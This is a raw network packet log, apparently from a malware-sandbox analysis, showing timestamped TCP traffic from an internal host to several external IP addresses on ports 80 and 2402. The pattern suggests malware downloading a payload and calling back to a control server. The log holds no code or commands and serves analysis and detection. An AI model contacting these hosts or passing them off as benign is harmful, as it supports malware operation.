                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337893009 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337899923 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337913036 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337932110 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.337986946 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338078022 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338090897 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338126898 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338146925 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338233948 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338282108 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338351965 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338371038 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338465929 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338521004 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338540077 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338546038 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338591099 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338598013 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338675976 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338725090 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338752985 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338884115 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339003086 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339021921 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339040041 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339090109 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339131117 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339143991 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339183092 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339247942 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339296103 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339368105 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339386940 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339462996 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339520931 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339520931 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339591026 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339651108 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339716911 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339742899 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339770079 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339871883 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339880943 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339988947 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339993000 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340037107 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340126038 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340131998 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340261936 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340470076 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340579987 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340603113 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340620995 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340626001 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340640068 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340657949 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340703964 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340703964 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340718031 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340751886 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340801001 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340892076 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340917110 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340938091 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341042042 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341042042 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341123104 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341146946 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341216087 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341249943 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341301918 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341373920 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341406107 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341510057 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341720104 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341773987 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341792107 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341809034 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341826916 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341844082 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341876030 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341876030 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341892004 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341922998 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341922998 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341970921 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342009068 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342020988 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342020988 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342108965 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342159986 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342263937 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.629782915 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.629861116 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.629915953 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.629991055 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.630064964 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.630119085 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.630227089 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.631906986 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.631982088 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632149935 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632204056 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632813931 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632884979 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632941008 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632996082 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633002043 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633049965 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633066893 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633066893 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633104086 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633219004 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633291960 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633316040 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633415937 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633472919 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633510113 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633573055 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633627892 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633723974 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633779049 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633833885 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633944988 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634017944 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634073973 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634133101 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634160995 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634160995 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634186983 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634227991 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634243011 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634296894 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634350061 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634350061 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634402990 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634418011 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634457111 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634463072 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634510994 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634563923 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634582996 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634582996 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634643078 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634697914 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634701014 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634699106 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634757996 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634812117 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634859085 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634923935 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634954929 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.634999037 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635057926 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635108948 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635112047 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635165930 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635219097 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635221004 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635272980 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635276079 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635327101 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635345936 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635345936 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635380983 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635435104 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635441065 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635490894 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635534048 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635545969 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635590076 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635596037 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635643005 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635695934 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635716915 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635768890 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635768890 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635834932 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635881901 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635890961 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635945082 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.635997057 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636089087 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636104107 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636157990 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636157990 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636217117 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636272907 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636277914 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636327028 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636380911 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636435032 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636460066 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636460066 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636528015 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636528969 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636578083 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636590004 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636635065 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636687994 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636740923 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636758089 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636828899 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636828899 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636842012 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636889935 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636898994 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.636953115 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637005091 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637033939 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637058973 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637105942 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637152910 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637157917 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637207985 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637259960 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637372017 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637444019 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637615919 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637631893 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637708902 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637763023 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637763977 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637855053 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.637888908 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638031006 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638041019 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638061047 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638185978 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638185978 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638262987 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638400078 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638408899 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638420105 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638525009 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.638525009 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.410552025 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.648978949 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.649898052 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.651243925 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.905077934 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:00.908058882 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.146765947 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.153382063 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.192812920 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.310750008 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.393667936 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.393929958 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.394501925 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.558844090 CET8050079178.237.33.50192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.559281111 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.559552908 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637311935 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637386084 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637445927 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637500048 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.637799978 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.818048000 CET8050079178.237.33.50192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.818766117 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.862622976 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878012896 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878051996 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878072023 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878232002 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878350973 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878354073 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878374100 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878391981 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878407955 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878454924 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.878604889 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.118807077 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.118887901 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.118944883 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119004011 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:02.119057894 CET24025007894.156.6.253192.168.11.20
